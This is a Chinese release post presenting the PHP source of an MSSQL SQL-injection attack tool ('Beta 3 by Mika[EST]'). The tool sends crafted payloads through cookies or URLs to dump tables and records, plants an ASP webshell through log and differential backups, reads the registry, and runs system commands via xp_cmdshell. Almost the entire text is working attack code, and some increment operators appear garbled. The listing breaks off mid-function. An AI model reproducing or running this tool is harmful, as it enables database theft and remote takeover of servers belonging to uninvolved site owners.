beta 3 final release版增加了最终版添加的功能比较多,改动的地方也很多,增加了一些常用的功能函数:
1、获取数据库服务器信息,包括一些扩展存储是否可用(但有的时候并不是很准确)
2、log备份获取webshell
3、差异备份获取webshell
4、xp_dirtree列目录
5、xp_regread读注册表
6、xp_cmdshell执行命令
7、自定制sql语句执行
代码如下:
<?php
$auth_ok=0;
$user=$_SERVER['PHP_AUTH_USER'];
$pass=$_SERVER['PHP_AUTH_PW'];
if(isset($user) && isset($pass) && $user=='admin' && $pass=='shmily'){
$auth_ok=1;
}
if(!$auth_ok)
{
header('WWW-Authenticate: Basic realm="Top Secret Area"');
header('HTTP/1.0 401 Unauthorized');
exit;
}
$cookie=$_POST['_cookie'];
$referer=$_POST['_referer'];
$url=$_POST['_url'];
$t_name=$_POST['_tablename'];
$tab_name=$_POST['_tabname'];
$field_name=$_POST['_fieldname'];
$proxy=$_POST['_proxy'];
$useproxy=$_POST['_useproxy'];
$_action=$_POST['_action'];
$_btype=$_POST['_btype'];
$_htype=$_POST['_htype'];
$function=$_POST['_function'];
$abspath=get_magic_quotes_gpc()?stripslashes($_POST['_abs_path']):$_POST['_abs_path'];
$code=get_magic_quotes_gpc()?stripslashes($_POST['_code']):$_POST['_code'];
$tmp_tab=$_POST['_temp_table'];
$regkey=get_magic_quotes_gpc()?stripslashes($_POST['_reg_key']):$_POST['_reg_key'];
$regvalue=get_magic_quotes_gpc()?stripslashes($_POST['_reg_value']):$_POST['_reg_value'];
$dir=get_magic_quotes_gpc()?stripslashes($_POST['_dir']):$_POST['_dir'];
$cmd=get_magic_quotes_gpc()?stripslashes($_POST['_cmd']):$_POST['_cmd'];
$execsql=get_magic_quotes_gpc()?stripslashes($_POST['_sql']):$_POST['_sql'];
?>
<html>
<head>
<title>Asp Mssql Cookie Sql Injection Tool</title>
<style>body{font-family:trebuchet ms;font-size:12px;color:green;background-color:black}hr{width:100%;height:2px;}br{height:0.5px}</style>
</head>
<body>
<center><h1>Asp Mssql Sql Injection Tool Beta 3 by Mika[EST]</h1></center>
<hr><hr>
<div align="left">
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
<form name="_common" action="<?=$_SERVER['PHP_SELF']?>" method="POST">
<tr>
<td><b>Exploitable Url: </b><input type="text" name="_url" size=60 value="<?=$url?>" />
<?php if(isset($url) && empty($url)) echo "<font color=red> unspecified</font>\n"?></td>
<td> Available Functions: <select name="_function">
<option value="info" onclick="_common._abs_path.disabled=true;_common._code.disabled=true;_common._temp_table.disabled=true;_common._reg_key.disabled=true;_common._reg_value.disabled=true;_common._dir.disabled=true;_common._cmd.disabled=true;_common._sql.disabled=true;" >Mssql server INFO</option>
<option value="logshell" onclick="_common._abs_path.disabled=false;_common._code.disabled=false;_common._temp_table.disabled=false;_common._reg_key.disabled=true;_common._reg_value.disabled=true;_common._dir.disabled=true;_common._cmd.disabled=true;_common._sql.disabled=true;" <?=($function=="logshell")?"selected":""?>>Log backup webshell</option>
<option value="diffshell" onclick="_common._abs_path.disabled=false;_common._code.disabled=false;_common._temp_table.disabled=false;_common._reg_key.disabled=true;_common._reg_value.disabled=true;_common._dir.disabled=true;_common._cmd.disabled=true;_common._sql.disabled=true;" <?=($function=="diffshell")?"selected":""?>>Differencial backup webshell</option>
<option value="listdir" onclick="_common._abs_path.disabled=true;_common._code.disabled=true;_common._temp_table.disabled=false;_common._reg_key.disabled=true;_common._reg_value.disabled=true;_common._dir.disabled=false;_common._cmd.disabled=true;_common._sql.disabled=true;" <?=($function=="listdir")?"selected":""?>>List Directory</option>
<option value="readreg" onclick="_common._abs_path.disabled=true;_common._code.disabled=true;_common._temp_table.disabled=false;_common._reg_key.disabled=false;_common._reg_value.disabled=false;_common._dir.disabled=true;_common._cmd.disabled=true;_common._sql.disabled=true;" <?=($function=="readreg")?"selected":""?>>Read Registry</option>
<option value="execcmd" onclick="_common._abs_path.disabled=true;_common._code.disabled=true;_common._temp_table.disabled=false;_common._reg_key.disabled=true;_common._reg_value.disabled=true;_common._dir.disabled=true;_common._cmd.disabled=false;_common._sql.disabled=true;" <?=($function=="execcmd")?"selected":""?>>Execute Command Via Xp_cmdshell</option>
<option value="execsql" onclick="_common._abs_path.disabled=true;_common._code.disabled=true;_common._temp_table.disabled=true;_common._reg_key.disabled=true;_common._reg_value.disabled=true;_common._dir.disabled=true;_common._cmd.disabled=true;_common._sql.disabled=false;" <?=($function=="execsql")?"selected":""?>>Execute Sql Query</option>
</select> <input type="submit" name="_submit" value="Execute Function"></input></td>
</tr>
<tr>
<td><b>Exploitable Cookie: </b><input type="text" name="_cookie" size=60 value="<?=$cookie?>"<?php if ($_htype=="url") echo "disabled";?> />
<?php if(isset($cookie) && empty($cookie)) echo "<font color=red> unspecified</font>\n"?></td>
<td> Webshell Absolute Path: <input type="text" name="_abs_path" size=30 value="<?=$abspath?>" <?=($function=="logshell" || $function=="diffshell")?"":"disabled"?>></input></td>
</tr>
<tr>
<td><b>Referer Url: </b><input type="text" name="_referer" size=60 value="<?=$referer?>" <?php if ($_htype=="url") echo "disabled";?>/>
<?php if(isset($referer) && empty($referer)) echo "<font color=red> unspecified</font>\n"?></td>
<td> Webshell code: <input type="text" name="_code" size=30 value='<?=empty($code)?"<%execute(request(\"l\"))%>":$code?>' <?=($function=="logshell" || $function=="diffshell")?"":"disabled"?>></input></td>
</tr>
<tr>
<td><input type="radio" name="_btype" value="num" <?php if (empty($_btype) || $_btype=="num") echo "checked";?>>Num Type</input>
<input type="radio" name="_btype" value="char" <?php if ($_btype=="char") echo "checked";?>>Char Type</input>
<input type="radio" name="_htype" value="url" <?php if ($_htype=="url") echo "checked";?> onclick="_url.disabled=false;_cookie.disabled=true;_referer.disabled=true;">Url</input>
<input type="radio" name="_htype" value="cookie" <?php if ($_htype=="cookie" || empty($_htype)) echo "checked";?> onclick="_url.disabled=false;_cookie.disabled=false;_referer.disabled=false;">Cookie</input></td>
<td> Temporary Table: <input type="text" name="_temp_table" size=15 value="<?=empty($tmp_tab)?"tmp_mika":$tmp_tab?>" <?=($function=="logshell" || $function=="diffshell" || $function=="listdir" || $function=="execcmd" || $function=="readreg")?"":"disabled"?>></input></td>
</tr>
<tr>
<td><input type="radio" name="_action" value="exp_tabs" <?php if(empty($_action) || $_action=="exp_tabs") echo "checked" ?> onclick="_tablename.disabled=true;_fieldname.disabled=true;_tabname.disabled=true;">Explode Tables Of Current DataBase</input></td>
<td> Registry Key: <input type="text" name="_reg_key" size=40 value="<?=empty($regkey)?"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\W3SVC\\Parameters\\Virtual Roots":$regkey?>" <?=($function=="readreg")?"":"disabled"?>></input></td>
</tr>
<tr>
<td><input type="radio" name="_action" value="exp_fields" onclick="_tablename.disabled=false;_fieldname.disabled=true;_tabname.disabled=true;" <?php if($_action=="exp_fields") echo "checked"?>>Explode Fields Of </input>
<input type="text" name="_tablename" size=30 value="<?php if(!empty($tab_name)) echo $tab_name; else echo $t_name;?>" <?php if($_action != "exp_fields") echo "disabled";?> /></td>
<td> Registry Value: <input type="text" name="_reg_value" size=20 value="<?=empty($regvalue)?"/":$regvalue?>" <?=($function=="readreg")?"":"disabled"?>></input></td>
</tr>
<tr>
<td><input type="radio" name="_action" value="exp_values" onclick="_tablename.disabled=true;_fieldname.disabled=false;_tabname.disabled=false;" <?php if($_action=="exp_values") echo "checked"?>>Explode Values Of </input>
<input type="text" name="_fieldname" size=30 value="<?=$field_name?>" <?php if($_action != "exp_values") echo "disabled";?>/> IN <input type="text" name='_tabname' size=20 value="<?php if(!empty($t_name)) echo $t_name; else echo $tab_name;?>" <?php if($_action != "exp_values") echo "disabled";?> /></td>
<td> Directory Path: <input type="text" name="_dir" size=20 value="<?=empty($dir)?"c:\\":$dir?>" <?=($function=="listdir")?"":"disabled"?>></input></td>
</tr>
<tr>
<td><input type="checkbox" name="_useproxy" value="use_proxy" onclick="nojavascript...if(this.checked==true){_proxy.disabled=false;}else {_proxy.disabled=true;}" <?php if(isset($useproxy) && !empty($proxy)) echo "checked";?>>Via Anonymous Proxy <input type="text" name="_proxy" size=30 value="<?=$proxy?>" <?php if(empty($proxy)) echo "disabled=true";?> ></input></td>
<td> cmd Command: <input type="text" name="_cmd" size=30 value="<?=empty($cmd)?"dir c:\\":$cmd?>" <?=($function=="execcmd")?"":"disabled"?>></input></td>
</tr>
<tr>
<td><input type="submit" name="_submit" value="Launch Attack"></input>
<?php echo str_repeat(' ',50);?>
<input type="reset" name="_reset" value="Reset Attack"></input>
</td>
<td> Sql Query: <input type="text" name="_sql" size=45 value="<?=$execsql?>" <?=($function=="execsql")?"":"disabled"?>></input></td>
</tr>
</form>
</table>
</div>
<hr><hr>
<?php
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
global $curl,$referer,$cookie,$url,$table_name,$field_name,$t_name,$tab_name;
$tab_exp="%20and%201=(select%20top%201%20nchar(124)%2bname%2bnchar(124)%20from%20sysobjects%20where%20xtype=nchar(85)%20and%20name%20not%20in(MFM_TABLES))--";
$field_exp="%20and%20(select%20top%201%20nchar(124)%2Bcol_name(object_id(TABLE_NAME),MFM_NUM)%2Bnchar(124)%20from%20sysobjects)%3E0--";
$value_exp="%20and%20(select%20top%201%20nchar(124)%2Bcast(MFM_FIELD_NAME%20as%20varchar(8000))%2Bnchar(124)%20from%20MFM_TABLE_NAME%20where%20MFM_FIELD_NAME%20not%20in(MFM_VALUE))%3E0--";
$count_exp="%20and%20(select%20nchar(124)%2Bcast(%20count(*)%20as%20varchar(255))%2bnchar(124)%20from%20MFM_TABLE_NAME)%3E0--";
$count_table="%20and%201=(select%20top%201%20nchar(124)%2bcast(count(*)%20as%20varchar(8000))%2bnchar(124)%20from%20sysobjects%20where%20xtype=nchar(85))--";
$count_column="%20and%201=(select%20nchar(124)%2Bcast(count(*)%20as%20varchar(8000))%2Bnchar(124)%20from%20syscolumns%20where%20id=object_id(MFM_TABLE_NAME))--";
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
if($_htype=='url'){
$cookie=$url;
$referer=$url;
}
if(array_key_exists("_submit",$_POST) && !empty($url) && !empty($cookie) && !empty($referer)){
$bstr=$_POST['_btype'];
$action=$_POST['_action'];
$submit=$_POST['_submit'];
echo "<div align=left><b>:::Attack Parameters:::</b><br>\n";
echo "<b>Target Url:</b><font color=blue>$url</font><br>\n";
if($_htype=='cookie'){
echo "<b>Target Cookie:</b><font color=blue>\"$cookie\"</font><br>\n";
echo "<b>Referer Url:</b><font color=blue>$referer</font><br>\n";
}
echo "<b>Exploit Type:</b><font color=blue>$_htype</font><br>\n";
echo "<b>Injection Type:</b>";
switch($bstr){
case 'num':
echo "<font color=blue>number</font><br>\n";
$bstr=0;//数字型
break;
case 'char':
echo "<font color=blue>character</font><br>\n";
$bstr=1;//字符型
break;
}
echo "<b>Via Proxy:</b>".((isset($useproxy) && !empty($proxy))? '<font color=blue>Yes</font>':'<font color=blue>No</font>')."<br>\n";
if(isset($useproxy) && !empty($proxy))
echo "<b>Proxy Address:</b><font color=blue>$proxy</font><br>\n";
echo "<b>Injection Action:</b>";
if($submit=="Launch Attack"){
switch($action){
case 'exp_tabs':
echo "<font color=blue>Explode Table Names</font><br>\n</div>\n";
exploit_tab();
break;
case 'exp_fields':
echo "<font color=blue>Explode Table Fields</font><br>\n";
if(empty($t_name))
die("<font color=red>Error:table name must be specified!</font><br>\n</div>\n");
$table_name=$t_name;
echo "<b>Table Name:</b><font color=blue>$table_name</font><br>\n</div>\n";
exploit_field();
break;
case 'exp_values':
echo "<font color=blue>Explode Table Values</font><br>\n";
if(empty($tab_name))
die("<font color=red>Error:table name must be specified!</font><br>\n</div>\n");
elseif(empty($field_name))
die("<font color=red>Error:field name must be specified!</font><br>\n</div>\n");
$table_name=$tab_name;
echo "<b>Table Name:</b><font color=blue>$table_name</font><br>\n";
echo "<b>Fields Name:</b><font color=blue>".str_replace(","," ",$field_name)."</font><br>\n</div>\n";
explode_value();
break;
}
}
else{
switch($function){
case 'info':
echo "<font color=blue>Get Server Information</font><br>\n</div>\n";
getinfo();
break;
case 'logshell':
case 'diffshell':
if($function=='logshell')
echo "<font color=blue>Bakcup Log Webshell</font><br>\n";
else
echo "<font color=blue>Bakcup differencial Webshell</font><br>\n";
if(empty($abspath))
die("<font color=red>Error:abspath must be specified!</font><br>\n</div>\n");
if(empty($code))
die("<font color=red>Error:code must be specified!</font><br>\n</div>\n");
if(empty($tmp_tab))
die("<font color=red>Error:temporary table must be specified!</font><br>\n</div>\n");
echo "<b>Path:</b><font color=blue>$abspath</font><br>\n";
echo "<b>code:</b><font color=blue>$code</font><br>\n";
echo "<b>temp table:</b><font color=blue>$tmp_tab</font><br>\n</div>\n";
if($function=='logshell')
logwebshell();
else
diffwebshell();
break;
case 'listdir':
echo "<font color=blue>List Directory</font><br>\n";
if(empty($tmp_tab))
die("<font color=red>Error:temporary table must be specified!</font><br>\n</div>\n");
if(empty($dir))
die("<font color=red>Error:Directory must be specified!</font><br>\n</div>\n");
echo "<b>temp table:</b><font color=blue>$tmp_tab</font><br>\n";
echo "<b>Directory:</b><font color=blue>$dir</font><br>\n</div>\n";
listdir();
break;
case 'readreg':
if(empty($regkey))
die("<font color=red>Error:registry key must be specified!</font><br>\n</div>\n");
if(empty($regvalue))
die("<font color=red>Error:registry value must be specified!</font><br>\n</div>\n");
if(empty($tmp_tab))
die("<font color=red>Error:temporary table must be specified!</font><br>\n</div>\n");
echo "<b>temp table:</b><font color=blue>$tmp_tab</font><br>\n";
echo "<b>registry key:</b><font color=blue>$regkey</font><br>\n";
echo "<b>registry value:</b><font color=blue>$regvalue</font><br>\n</div>\n";
readreg();
break;
case 'execcmd':
if(empty($tmp_tab))
die("<font color=red>Error:temporary table must be specified!</font><br>\n</div>\n");
if(empty($cmd))
die("<font color=red>Error:cmd must be specified!</font><br>\n</div>\n");
echo "<b>temp table:</b><font color=blue>$tmp_tab</font><br>\n";
echo "<b>cmd command:</b><font color=blue>$cmd</font><br>\n</div>\n";
execcmd();
break;
case 'execsql':
if(empty($execsql))
die("<font color=red>Error:sql must be specified!</font><br>\n</div>\n");
echo "<b>sql query string:</b><font color=blue>$execsql</font><br>\n</div>\n";
execsql();
break;
}
}
}
///////////////////////////////////////////////////////////////////////////////////////
function dbgput($info)
{
echo "<div align=center><textarea title=\"Debug Info\" cols=\"50\" rows=\"10\" wrap=\"hard\">$info</textarea></div><br>";
}
/////////////////////////////////////////////////////////////////////////////////////
function getinfo(){
global $bstr,$cookie;
$s1=" and (select char(124) @@VERSION char(92) system_user char(92) user char(92) db_name() char(92) convert(char(1),IS_MEMBER (0x640062005F006F0077006E0065007200)) char(92) convert(char(1),IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)) char(92) convert(char(1),IS_SRVROLEMEMBER(0x730065007200760065007200610064006D0069006E00)) char(92) convert(char(1),IS_SRVROLEMEMBER(0x620075006C006B00610064006D0069006E00)) char(92) convert(char(1),IS_SRVROLEMEMBER(0x73006500740075007000610064006D0069006E00)) char(92) convert(char(1),IS_SRVROLEMEMBER(0x6400690073006B00610064006D0069006E00)) char(124))>0--";
$s2=" and (select char(124) cast(count(*) as varchar(400)) char(124) from master..sysobjects where xtype=0x5800 and name=XP_XP_XP)>0--";
$xps=array('xp_cmdshell','xp_regread','xp_dirtree','xp_subdirs','xp_IsNtAdmin','sp_oamethod','sp_oacreate');
$infohead=array('Server Version','LoginName','Username','Database','IsDb_Onwer','IsSysadmin','IsServerAdmin','IsBulkAdmin','IsSetupAdmin','IsDisckAdmin');
if($bstr)
$new_cookie=str_replace("MIKA",'%27'.urlencode($s1),$cookie);
else
$new_cookie=str_replace("MIKA",urlencode($s1),$cookie);
init_session();
$re=find_value($new_cookie);
if($re==null)
die("<b>Failure</b>");
$info=explode(chr(92),$re);
$i=0;
echo "<br><div align=center><h2>:::Mssql Server Information:::</h2><br><hr><br>\n";
echo "<table border=\"1\">\n";
foreach($infohead as $head){
echo "<tr><th><b>$head:</b></th><td><font color=blue>$info[$i]</font></td></tr>\n";
$i ;
}
foreach($xps as $xp){
$new_s2=str_replace("XP_XP_XP",str2sqlhex($xp),$s2);
//dbgput($new_s2);
if($bstr)
$new_cookie=str_replace("MIKA",'%27'.urlencode($new_s2),$cookie);
else
$new_cookie=str_replace("MIKA",urlencode($new_s2),$cookie);
$re=find_value($new_cookie);
if($re==null)
die("<b>Fuck</b>");
echo "<tr><th><b>$xp:</b></th><td><font color=blue>$re</font></td></tr>\n";
}
echo "</table></div><br>\n";
}
///////////////////////////////////////////////////////////////////////////////////////
function logwebshell(){
global $bstr,$cookie,$curl,$_htype,$abspath,$code,$tmp_tab;
$logstrs=array(";alter database db_name() set RECOVERY FULL--",";drop table [$tmp_tab];create table [$tmp_tab]([cmd] [image])--",";declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x63003A005C006D0069006B0061002E00620061006B00 backup log @a to disk = @s with init--",";insert into [$tmp_tab](cmd) values(".str2hex($code).")--",";declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=".str2sqlhex($abspath)." backup log @a to disk=@s with init--",";alter database db_name() set RECOVERY SIMPLE--");
init_session();
curl_setopt($curl,CURLOPT_NOBODY,1);
echo "<center><h2><font color=blue>Execution Track Data</font></h2></center><br><hr>\n";
echo "<div align=center><table border=\"2\">\n";
foreach($logstrs as $logstr){
if($bstr)
$new_cookie=str_replace("MIKA",'%27'.urlencode($logstr),$cookie);
else
$new_cookie=str_replace("MIKA",urlencode($logstr),$cookie);
flush();
if($_htype=='url')
curl_setopt($curl,CURLOPT_URL,$new_cookie);
else
curl_setopt($curl,CURLOPT_COOKIE,$new_cookie);
$retnstr=curl_exec($curl);
if(substr($retnstr,9,3)!='200')
echo "<tr><td><font color=red>$logstr</font></td></tr>\n";
else
echo "<tr><td><font color=blue>$logstr</font></td></tr>\n";
sleep(5);
}
curl_close($curl);
echo "</table></div>";
//dbgput($retnstr);
}
///////////////////////////////////////////////////////////////////////////////////////
function diffwebshell(){
global $bstr,$cookie,$curl,$_htype,$abspath,$code,$tmp_tab;
$diffstrs=array(";declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x6D0069006B0061002E00620061006B00 backup database @a to disk=@s--",";drop table [$tmp_tab];create table [$tmp_tab] ([cmd] [image])--",";insert into $tmp_tab(cmd) values(".str2hex($code).")--","declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=".str2sqlhex($abspath)." backup database @a to disk=@s WITH DIFFERENTIAL");
init_session();
curl_setopt($curl,CURLOPT_NOBODY,1);
echo "<center><h2><font color=blue>Execution Track Data</font></h2></center><br><hr>\n";
echo "<div align=center><table border=\"2\">\n";
foreach($diffstrs as $diffstr){
if($bstr)
$new_cookie=str_replace("MIKA",'%27'.urlencode($diffstr),$cookie);
else
$new_cookie=str_replace("MIKA",urlencode($diffstr),$cookie);
flush();
if($_htype=='url')
curl_setopt($curl,CURLOPT_URL,$new_cookie);
else
curl_setopt($curl,CURLOPT_COOKIE,$new_cookie);
$retnstr=curl_exec($curl);
if(substr($retnstr,9,3)!='200')
echo "<tr><td><font color=red>$logstr</font></td></tr>\n";
else
echo "<tr><td><font color=blue>$logstr</font></td></tr>\n";
sleep(5);
}
curl_close($curl);
echo "</table></div>";
}
///////////////////////////////////////////////////////////////////////////////////////
function listdir(){
global $curl,$cookie,$bstr,$tmp_tab,$dir,$table_name,$field_name,$_htype;
$dirstrs=array(";drop table [$tmp_tab];create table [$tmp_tab]([subdir] nvarchar(400) NULL,[depth] tinyint NULL,[file] bit NULL)--",";DELETE [$tmp_tab];Insert [$tmp_tab] exec master..xp_dirtree 'MIKA_PATH',1,1--");
if($bstr)
$new_cookie=str_replace("MIKA",'%27'.urlencode($dirstrs[0]),$cookie);
else
$new_cookie=str_replace("MIKA",urlencode($dirstrs[0]),$cookie);
init_session();
curl_setopt($curl,CURLOPT_NOBODY,1);
if($_htype=='url')
curl_setopt($curl,CURLOPT_URL,$new_cookie);
else
curl_setopt($curl,CURLOPT_COOKIE,$new_cookie);
//echo $new_cookie."<br>\n";
$rtnstr=curl_exec($curl);
//echo $rtnstr."<br>\n";
if(substr($rtnstr,9,3)!='200')
//echo "<b><font color=red>may be something wrong!</font></b>\n";
sleep(3);
$dirstr=str_replace("MIKA_PATH",$dir,$dirstrs[1]);
//dbgput($new_cookie);
if($bstr)
$new_cookie=str_replace("MIKA",'%27'.urlencode($dirstr),$cookie);
else
$new_cookie=str_replace("MIKA",urlencode($dirstr),$cookie);
if($_htype=='url')
curl_setopt($curl,CURLOPT_URL,$new_cookie);
else
curl_setopt($curl,CURLOPT_COOKIE,$new_cookie);
$rtnstr=curl_exec($curl);
if(substr($rtnstr,9,3)!='200');
//echo "<b><font color=red>may be something wrong!</font></b>\n";
sleep(3);
curl_close($curl);
$table_name=$tmp_tab;
$field_name="subdir,depth,file";
explode_value();
}
///////////////////////////////////////////////////////////////////////////////////////
function readreg(){
global $cookie,$curl,$tmp_tab,$_htype,$regkey,$regvalue,$bstr,$table_name,$field_name;
$regstrs=array("DROP TABLE [$tmp_tab];CREATE TABLE [$tmp_tab]([Value] nvarchar(4000) NULL,[Data] nvarchar(4000) NULL)--",";DELETE [$tmp_tab];Insert [$tmp_tab] exec master.dbo.xp_regread 'MIKA_ROOT','MIKA_SUB','MIKA_VALUE'--");
$keys=explode("\\",$regkey);
$rootkey=$keys[0];
array_shift($keys);
$subkey=implode("\\",$keys);
if($bstr)
$new_cookie=str_replace("MIKA",'%27'.urlencode($regstrs[0]),$cookie);
else
$new_cookie=str_replace("MIKA",urlencode($regstrs[0]),$cookie);
init_session();
curl_setopt($curl,CURLOPT_NOBODY,1);
if($_htype=='url')
curl_setopt($curl,CURLOPT_URL,$new_cookie);
else
curl_setopt($curl,CURLOPT_COOKIE,$new_cookie);
//echo $new_cookie."<br>\n";
$rtnstr=curl_exec($curl);
//echo $rtnstr."<br>\n";
if(substr($rtnstr,9,3)!='200')
//echo "<b><font color=red>may be something wrong!</font></b>\n";
sleep(3);
$regstr=str_replace("MIKA_ROOT",$rootkey,$regstrs[1]);
$regstr=str_replace("MIKA_SUB",$subkey,$regstr);
$regstr=str_replace("MIKA_VALUE",$regvalue,$regstr);
//dbgput($new_cookie);
if($bstr)
$new_cookie=str_replace("MIKA",'%27'.urlencode($regstr),$cookie);
else
$new_cookie=str_replace("MIKA",urlencode($regstr),$cookie);
if($_htype=='url')
curl_setopt($curl,CURLOPT_URL,$new_cookie);
else
curl_setopt($curl,CURLOPT_COOKIE,$new_cookie);
$rtnstr=curl_exec($curl);
if(substr($rtnstr,9,3)!='200');
//echo "<b><font color=red>may be something wrong!</font></b>\n";
curl_close($curl);
sleep(3);
$table_name=$tmp_tab;
$field_name="Value,Data";
explode_value();
}
///////////////////////////////////////////////////////////////////////////////////////
function execcmd(){
global $cookie,$bstr,$_btype,$curl,$cmd,$tmp_tab,$table_name,$field_name;
$cmdstrs=array(";drop table [$tmp_tab];create table [$tmp_tab]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL)--",";declare @a sysname select @a=".str2sqlhex($cmd)." insert into [$tmp_tab](ResultTxt) exec master.dbo.xp_cmdshell @a--");
init_session();
curl_setopt($curl,CURLOPT_NOBODY,1);
echo "<center><h2><font color=blue>Execution Track Data</font></h2></center><br>\n";
echo "<div align=center><table border=\"2\">\n";
foreach($cmdstrs as $cmdstr){
if($bstr)
$new_cookie=str_replace("MIKA",'%27'.urlencode($cmdstr),$cookie);
else
$new_cookie=str_replace("MIKA",urlencode($cmdstr),$cookie);
flush();
if($_htype=='url')
curl_setopt($curl,CURLOPT_URL,$new_cookie);
else
curl_setopt($curl,CURLOPT_COOKIE,$new_cookie);
$retnstr=curl_exec($curl);
if(substr($retnstr,9,3)!='200')
echo "<tr><td><font color=red>$cmdstr</font></td></tr>\n";
else
echo "<tr><td><font color=blue>$cmdstr</font></td></tr>\n";
sleep(5);
}
curl_close($curl);
echo "</table></div>";
$table_name=$tmp_tab;
$field_name="ResultTxt";
explode_value();
}
///////////////////////////////////////////////////////////////////////////////////////
function execsql(){
global $bstr,$cookie,$curl,$execsql,$_htype;
if($bstr)
$new_cookie=str_replace("MIKA",'%27'.urlencode($execsql),$cookie);
else
$new_cookie=str_replace("MIKA",urlencode($execsql),$cookie);
init_session();
if($_htype=="cookie")
curl_setopt($curl,CURLOPT_COOKIE,$new_cookie);
else
curl_setopt($curl,CURLOPT_URL,$new_cookie);
$retnstr=curl_exec($curl);
curl_close($curl);
echo "<center><h2>:::Execution Results:::</h2></center><br>\n";
dbgput($retnstr);
}
///////////////////////////////////////////////////////////////////////////////////////
function output_start()
{
echo "<hr><br>\n";
echo "<div align=center>\n";
echo "<table border=\"1\">\n";
flush();
}
function output_th($th)
{
switch($th){
case 'tr':
echo "<tr>";
break;
case '/tr':
echo "</tr>\n";
break;
default:
echo "<th><font color=blue>$th</font></th>\n";
break;
}
flush();
}
function output_td($td)
{
switch($td){
case 'tr':
echo "<tr>";
break;
case '/tr':
echo "</tr>\n";
break;
default:
echo "<td><font color=blue>$td</font></td>\n";
break;
}
flush();
}
function output_end()
{
echo "</table></div><br>\n";
flush();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//暴取字段值函数
function explode_value()
{
global $bstr,$table_name,$field_name,$cookie,$count_exp,$curl;
$i=1;
$count=0;
$tmp_str="";
$fields=explode(",",$field_name);
$sql_str=" And (Select Top 1 char(124)";
$sub_str=' isNull(cast([MIKA_FIELD] as nvarchar(4000)),char(32))';
foreach($fields as $field){
$new_sub_str=str_replace('MIKA_FIELD',$field,$sub_str);
$sql_str.=$new_sub_str." char(13)";
$tmp_str.="[$field],";
}
$sql_str=substr($sql_str,0,strlen($sql_str)-9);
$tmp_str=substr($tmp_str,0,strlen($tmp_str)-1);
$sql_str.=" char(124) from (Select Top MIKA_NUM $tmp_str From [MIKA_TABLE] Where 1=1 Order by $tmp_str) T Order by ";
$sub_str="[MIKA_FIELD] desc";
foreach($fields as $field){
$sub_strs[]=str_replace('MIKA_FIELD',$field,$sub_str);
}
$sql_str.=implode(",",$sub_strs).")>0--";
$sql_str=str_replace('MIKA_TABLE',$table_name,$sql_str);
//echo $sql_str."<br>\n";
$old=str_replace('MFM_TABLE_NAME',$table_name,$count_exp);
init_session();
if($bstr)
$new_cookie=str_replace('MIKA','%27'.$old,$cookie);
else
$new_cookie=str_replace('MIKA',$old,$cookie);
output_start();
$re=find_value($new_cookie);
if($re)
{
$count=$re;
echo "<b>the number of record in $table_name:</b> <font color=blue>$count</font>\n";
}
output_th('tr');
foreach ($fields as $field){
output_th($field);
}
output_th('/tr');
do{
$new_sql_str=str_replace('MIKA_NUM',$i,$sql_str);
//echo $new_sql_str."<br>\n";
if($bstr)
$new_cookie=str_replace('MIKA','%27'.urlencode($new_sql_str),$cookie);
else
$new_cookie=str_replace('MIKA',urlencode($new_sql_str),$cookie);
$re=find_value($new_cookie);
output_td('tr');
if($re!=null)
{
$res=explode(chr(13),$re);
foreach($res as $ree){
output_td($ree);
}
}
output_td('/tr');
$i ;
}while($i<=$count);
output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//另一种方式暴取表名的函数
function explode_tab(){
global $bstr,$curl,$cookie;
$num=1;
$i=0;
$old_re="";
$re="";
$words=" And (Select Top 1 nchar(124) cast(name as varchar(8000)) nchar(124) from(Select Top MIKA_NUM id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0--";
init_session();
output_th('tr');
for($i=0;$i<8;$i )
output_th('Tables');
output_th('/tr');
output_td('tr');
do{
$new_words=str_replace('MIKA_NUM',$num,$words);
if($bstr)
$new_cookie=str_replace('MIKA',"%27".urlencode($new_words),$cookie);
else
$new_cookie=str_replace('MIKA',urlencode($new_words),$cookie);
$re=find_value($new_cookie);
if($re!=$old_re)
{
output_td($re);
if(($num % 8)==0)
{
output_td('/tr');
output_td('tr');
}
}
else
break;
$old_re=$re;
$num ;
}while($re);
output_td('/tr');
output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//初始化会话函数
function init_session(){
global $proxy,$curl,$referer,$url,$_htype;
$curl=curl_init();
curl_setopt($curl,CURLOPT_HEADER,1);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
if($_htype=='cookie'){
curl_setopt($curl,CURLOPT_REFERER,$referer);
curl_setopt($curl,CURLOPT_URL,$url);
}
if(isset($useproxy) && !empty($proxy))
curl_setopt($curl,CURLOPT_PROXY,"$proxy");
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//通用取值函数
function find_value($cookie,$debug=0){
global $curl,$_htype;
//echo $cookie."\n";
if($debug)
dbgput($cookie);
if($_htype=='cookie')
curl_setopt($curl,CURLOPT_COOKIE,$cookie);
else
curl_setopt($curl,CURLOPT_URL,$cookie);
$content=curl_exec($curl);
if($debug)
dbgput($content);
//echo $content;
$re=preg_match("/(\|.*\|)/si",$content,$result);
if($debug)
dbgput($result[1]);
if($re)
{
return str_replace('|','',$result[1]);
}
return 0;
}
///////////////////////////////////////////////////////////////////////////////////////
function str2hex($str){
$temp="0x";
for($i=0;$i<strlen($str);$i )
$temp.=dechex(ord($str[$i]));
return $temp;
}
///////////////////////////////////////////////////////////////////////////////////////
//字符串转换为msssql的16进制数值
function str2sqlhex($str){
$temp="0x";
for($i=0;$i<strlen($str);$i ){
//echo $str[$i]."\n";
